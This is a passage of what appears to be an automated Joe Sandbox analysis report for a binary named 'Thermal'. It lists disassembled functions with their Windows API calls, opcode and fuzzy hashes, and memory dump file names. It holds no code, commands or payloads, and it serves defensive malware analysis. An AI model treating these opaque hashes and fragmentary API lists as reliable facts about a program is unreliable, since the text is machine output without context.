                                                      • Opcode ID: d06dccf0347c895aa49821e467b5e47912e0cc67893bd98ce20b7c2aafbed1ea
                                                      • Instruction ID: de67088b250cac4fa71332dcac28cfda056c1be89749a65540d6fc3edad9925c
                                                      • Opcode Fuzzy Hash: d06dccf0347c895aa49821e467b5e47912e0cc67893bd98ce20b7c2aafbed1ea
                                                      • Instruction Fuzzy Hash: 97411930704790FED7398F29AC88A7F7B92BB95301F16440DE8574A960DB71A8A4E761
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00187698
                                                        • Part of subcall function 00140FE6: std::exception::exception.LIBCMT ref: 0014101C
                                                        • Part of subcall function 00140FE6: __CxxThrowException@8.LIBCMT ref: 00141031
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 001876CF
                                                      • EnterCriticalSection.KERNEL32(?), ref: 001876EB
                                                      • _memmove.LIBCMT ref: 00187739
                                                      • _memmove.LIBCMT ref: 00187756
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00187765
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0018777A
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00187799
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 256516436-0
                                                      • Opcode ID: 376f468af8ea12209756c451bab423d3195a628936898e713001cb35f35635af
                                                      • Instruction ID: 0c7dbd7455648cc804e8886efb047b5a979c3609d9a1a60583019b849a2f67d4
                                                      • Opcode Fuzzy Hash: 376f468af8ea12209756c451bab423d3195a628936898e713001cb35f35635af
                                                      • Instruction Fuzzy Hash: E1319231904105EFDB11EF64DC89E6FB7B8EF49710B2441A5F904AB296D730DE94CBA0
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 001A6810
                                                      • GetDC.USER32(00000000), ref: 001A6818
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001A6823
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 001A682F
                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 001A686B
                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 001A687C
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,001A964F,?,?,000000FF,00000000,?,000000FF,?), ref: 001A68B6
                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 001A68D6
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                      • String ID:
                                                      • API String ID: 3864802216-0
                                                      • Opcode ID: 01c337be264f01fba31954a81070f4be216df2ec6e9725e9d2b8b9b99d9db0b1
                                                      • Instruction ID: 51b810e57c1f0d362ddb36f34cdd2a488fac57d2e1393d8e148e75adeb82d126
                                                      • Opcode Fuzzy Hash: 01c337be264f01fba31954a81070f4be216df2ec6e9725e9d2b8b9b99d9db0b1
                                                      • Instruction Fuzzy Hash: AE316D76101214BFEB118F10CC8AFAB3BADEB4A761F044155FE089A291D7759891CB70
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: 15cd855d1fbd221218b847222fd8ab78a4b8b711e0e63a881f6f0fe38400ac77
                                                      • Instruction ID: dc28c497f7bb9880be3a49b26d72927a4d0ca0711a8a8db3998f294773ac1c97
                                                      • Opcode Fuzzy Hash: 15cd855d1fbd221218b847222fd8ab78a4b8b711e0e63a881f6f0fe38400ac77
                                                      • Instruction Fuzzy Hash: A121A4726012157AD60C7621CE82FEF377CAF25794F058029FE1AA6353EB50DE218AE1
                                                      APIs
                                                        • Part of subcall function 00124D37: __itow.LIBCMT ref: 00124D62
                                                        • Part of subcall function 00124D37: __swprintf.LIBCMT ref: 00124DAC
                                                        • Part of subcall function 0013436A: _wcscpy.LIBCMT ref: 0013438D
                                                      • _wcstok.LIBCMT ref: 0018F2D7
                                                      • _wcscpy.LIBCMT ref: 0018F366
                                                      • _memset.LIBCMT ref: 0018F399
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                      • String ID: X
                                                      • API String ID: 774024439-3081909835
                                                      • Opcode ID: 3ef9f888a0c39cff88b53b0228723e9c966ebd6b1ffbc0006769d7baf9b8a6d3
                                                      • Instruction ID: a3cf979a2c3388a75226ec08eeec987fdd3d5e7c7de9563f90f8985974d00d9a
                                                      • Opcode Fuzzy Hash: 3ef9f888a0c39cff88b53b0228723e9c966ebd6b1ffbc0006769d7baf9b8a6d3
                                                      • Instruction Fuzzy Hash: 2BC17B71608740AFC724EF64D891A6AB7E4FF94350F00492DF899972A2DB30ED46CF92
                                                      APIs
                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 001972EB
                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0019730C
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0019731F
                                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 001973D5
                                                      • inet_ntoa.WSOCK32(?), ref: 00197392
                                                        • Part of subcall function 0017B4EA: _strlen.LIBCMT ref: 0017B4F4
                                                        • Part of subcall function 0017B4EA: _memmove.LIBCMT ref: 0017B516
                                                      • _strlen.LIBCMT ref: 0019742F
                                                      • _memmove.LIBCMT ref: 00197498
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                      • String ID:
                                                      • API String ID: 3619996494-0
                                                      • Opcode ID: 421d14a894c98848b6c7f9dcf2c357451a92b3c34c31453061096a95daf54724
                                                      • Instruction ID: e19b77fe10127f8a62791856544b020740cf3901e2e39a92e6e1d4a088daef46
                                                      • Opcode Fuzzy Hash: 421d14a894c98848b6c7f9dcf2c357451a92b3c34c31453061096a95daf54724
                                                      • Instruction Fuzzy Hash: 3181D271618310ABDB14EB24DC82E6FB7A8EFA4714F10861CF5569B2D2EB70ED41CB91
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a35b6abf9d36672a80cdd91bdf09924768a15e2691c61674d4f898520167b32a
                                                      • Instruction ID: e27894e23b4a8b435f9637f4dd0a823a81365970fbb89d9d61d51a126cedfe4d
                                                      • Opcode Fuzzy Hash: a35b6abf9d36672a80cdd91bdf09924768a15e2691c61674d4f898520167b32a
                                                      • Instruction Fuzzy Hash: C2717D30900119FFCB09DF58DC88ABEBB79FF99315F158259F915AB251C7309A61CBA0
                                                      APIs
                                                      • IsWindow.USER32(010E4AA0), ref: 001ABA5D
                                                      • IsWindowEnabled.USER32(010E4AA0), ref: 001ABA69
                                                      • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 001ABB4D
                                                      • SendMessageW.USER32(010E4AA0,000000B0,?,?), ref: 001ABB84
                                                      • IsDlgButtonChecked.USER32(?,?), ref: 001ABBC1
                                                      • GetWindowLongW.USER32(010E4AA0,000000EC), ref: 001ABBE3
                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 001ABBFB
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                      • String ID:
                                                      • API String ID: 4072528602-0
                                                      • Opcode ID: 7cc363adfe5ab7963a79fe8a1f1d2d142cc0ab07531dd38c3eb3f41e3a0fc813
                                                      • Instruction ID: 2e96a2a62618b077f28fc4fb3c18549ca918e88bc7e825d69712d164a3b52e2b
                                                      • Opcode Fuzzy Hash: 7cc363adfe5ab7963a79fe8a1f1d2d142cc0ab07531dd38c3eb3f41e3a0fc813
                                                      • Instruction Fuzzy Hash: DB71A238608284EFEB25DF54C8D4FBABBB5FF5A310F144059E946972A2C731AD90DB60
                                                      APIs
                                                      • _memset.LIBCMT ref: 0019FB31
                                                      • _memset.LIBCMT ref: 0019FBFA
                                                      • ShellExecuteExW.SHELL32(?), ref: 0019FC3F
                                                        • Part of subcall function 00124D37: __itow.LIBCMT ref: 00124D62
                                                        • Part of subcall function 00124D37: __swprintf.LIBCMT ref: 00124DAC
                                                        • Part of subcall function 0013436A: _wcscpy.LIBCMT ref: 0013438D
                                                      • GetProcessId.KERNEL32(00000000), ref: 0019FCB6
                                                      • CloseHandle.KERNEL32(00000000), ref: 0019FCE5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                      • String ID: @
                                                      • API String ID: 3522835683-2766056989
                                                      • Opcode ID: aa68bf086f257f399293bb24f33c013c88a65e48c9d1e38e5f36c5bbed2fdab1
                                                      • Instruction ID: dc3d08156ae97f9d5c7abfac82c577b1081dbea20299715dc4e814942f20fd8e
                                                      • Opcode Fuzzy Hash: aa68bf086f257f399293bb24f33c013c88a65e48c9d1e38e5f36c5bbed2fdab1
                                                      • Instruction Fuzzy Hash: 51618C75A00629AFCF14EFA4C4919AEBBF5FF58310F148569E816AB351CB30AD42CF90
                                                      APIs
                                                      • GetParent.USER32(?), ref: 0018178B
                                                      • GetKeyboardState.USER32(?), ref: 001817A0
                                                      • SetKeyboardState.USER32(?), ref: 00181801
                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 0018182F
                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0018184E
                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00181894
                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 001818B7
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: e3063e1983c575abb8861ca946b7855a5bef433ed94ac9b190854f18d2de628a
                                                      • Instruction ID: 3564a0b73efef7787748a193805d522c1ee57d5ea3e8385b4050b2d81e810a5f
                                                      • Opcode Fuzzy Hash: e3063e1983c575abb8861ca946b7855a5bef433ed94ac9b190854f18d2de628a
                                                      • Instruction Fuzzy Hash: EB51F5A29047D53DFB366224CC06BB67EED5B06304F08498DE0D5468C2D398DED6DF50
                                                      APIs
                                                      • GetParent.USER32(00000000), ref: 001815A4
                                                      • GetKeyboardState.USER32(?), ref: 001815B9
                                                      • SetKeyboardState.USER32(?), ref: 0018161A
                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00181646
                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00181663
                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001816A7
                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001816C8
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 9d35a2d4b78077122e230e93254f4629538bf9b2da3925a65150577feb61141e
                                                      • Instruction ID: e98419a9316456c54c6379a23ab22a6333b4dfcd71244b530a5c99e5dc7afbd8
                                                      • Opcode Fuzzy Hash: 9d35a2d4b78077122e230e93254f4629538bf9b2da3925a65150577feb61141e
                                                      • Instruction Fuzzy Hash: FF51F3A29047D53DFB36A324CC41BBA7EAD5B06300F1C8589E0D9468C2D794EE8AEB50
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _wcsncpy$LocalTime
                                                      • String ID:
                                                      • API String ID: 2945705084-0
                                                      • Opcode ID: ec45c92c93d3f99f2d0ab31cca1e987dac73bc8363a2903adf732b233ac22cbf
                                                      • Instruction ID: 8515722ee8d466e52b0a51a5456bf39b4184dd223df6e6e7826187ec62723097
                                                      • Opcode Fuzzy Hash: ec45c92c93d3f99f2d0ab31cca1e987dac73bc8363a2903adf732b233ac22cbf
                                                      • Instruction Fuzzy Hash: 7041ACA6C206187ACB11FBF4884AACFB3B9EF15320F508956F919E3121E734A35587A5
                                                      APIs
                                                        • Part of subcall function 00184BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00183B8A,?), ref: 00184BE0
                                                        • Part of subcall function 00184BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00183B8A,?), ref: 00184BF9
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00183BAA
                                                      • _wcscmp.LIBCMT ref: 00183BC6
                                                      • MoveFileW.KERNEL32(?,?), ref: 00183BDE
                                                      • _wcscat.LIBCMT ref: 00183C26
                                                      • SHFileOperationW.SHELL32(?), ref: 00183C92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                      • String ID: \*.*
                                                      • API String ID: 1377345388-1173974218
                                                      • Opcode ID: 8d7e4fd3b581fef58632ba598b285a8e4dbb1351daeb37fae3021ebd001b14a3
                                                      • Instruction ID: b8ec68153fb470d54c4a2586d79258594ac64b4f55e4858e033bd9938460cc16
                                                      • Opcode Fuzzy Hash: 8d7e4fd3b581fef58632ba598b285a8e4dbb1351daeb37fae3021ebd001b14a3
                                                      • Instruction Fuzzy Hash: 96418BB140C344AAC752EF64C481ADBB7E8AF99740F44092EF49AC3161EB34D7888B52
                                                      APIs
                                                      • _memset.LIBCMT ref: 001A78CF
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001A7976
                                                      • IsMenu.USER32(?), ref: 001A798E
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001A79D6
                                                      • DrawMenuBar.USER32 ref: 001A79E9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                      • String ID: 0
                                                      • API String ID: 3866635326-4108050209
                                                      • Opcode ID: 8cb44c7fa427467837b073c767941d0a85effff81b29914f0ef022afe69d2190
                                                      • Instruction ID: f5b62877869d6b268f89def47bde603b8014a45fc41c866c6b928a4ba713dba8
                                                      • Opcode Fuzzy Hash: 8cb44c7fa427467837b073c767941d0a85effff81b29914f0ef022afe69d2190
                                                      • Instruction Fuzzy Hash: 0B414D75A04249EFDB20DF54D884E9AB7F9FB0A324F04412AE95597290C770AE50CF90
                                                      APIs
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 001A1631
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001A165B
                                                      • FreeLibrary.KERNEL32(00000000), ref: 001A1712
                                                        • Part of subcall function 001A1602: RegCloseKey.ADVAPI32(?), ref: 001A1678
                                                        • Part of subcall function 001A1602: FreeLibrary.KERNEL32(?), ref: 001A16CA
                                                        • Part of subcall function 001A1602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 001A16ED
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 001A16B5
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                      • String ID:
                                                      • API String ID: 395352322-0
                                                      • Opcode ID: 0a4c995ce765981966156d04b5e4eab11451f760b300b9d7c43646daf080ecb9
                                                      • Instruction ID: 3bfe5bf56830c1640094cc5034d70671d2384ee426371a85ef9c0f6d04c859bf
                                                      • Opcode Fuzzy Hash: 0a4c995ce765981966156d04b5e4eab11451f760b300b9d7c43646daf080ecb9
                                                      • Instruction Fuzzy Hash: B0313AB5900209BFDB159B90DC89AFFB7BCEF09340F00026AF505E2150EB709E859AA0
                                                      APIs
                                                      • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 001A6911
                                                      • GetWindowLongW.USER32(010E4AA0,000000F0), ref: 001A6944
                                                      • GetWindowLongW.USER32(010E4AA0,000000F0), ref: 001A6979
                                                      • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 001A69AB
                                                      • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 001A69D5
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 001A69E6
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001A6A00
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$MessageSend
                                                      • String ID:
                                                      • API String ID: 2178440468-0
                                                      • Opcode ID: 7ff6e5372b57a6089511ea1ad3449664f9fe386fc4e95d1d220492953798d77b
                                                      • Instruction ID: cc6b99caa18d3a5de2cc333579c98577ac74ea95c686e612b7aed7b130553f40
                                                      • Opcode Fuzzy Hash: 7ff6e5372b57a6089511ea1ad3449664f9fe386fc4e95d1d220492953798d77b
                                                      • Instruction Fuzzy Hash: CE313738604194EFEB22CF58DC88F6A37E1EB5A758F1911A4F5148F6B1CB72AC84CB50
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0017E2CA
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0017E2F0
                                                      • SysAllocString.OLEAUT32(00000000), ref: 0017E2F3
                                                      • SysAllocString.OLEAUT32(?), ref: 0017E311
                                                      • SysFreeString.OLEAUT32(?), ref: 0017E31A
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0017E33F
                                                      • SysAllocString.OLEAUT32(?), ref: 0017E34D
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
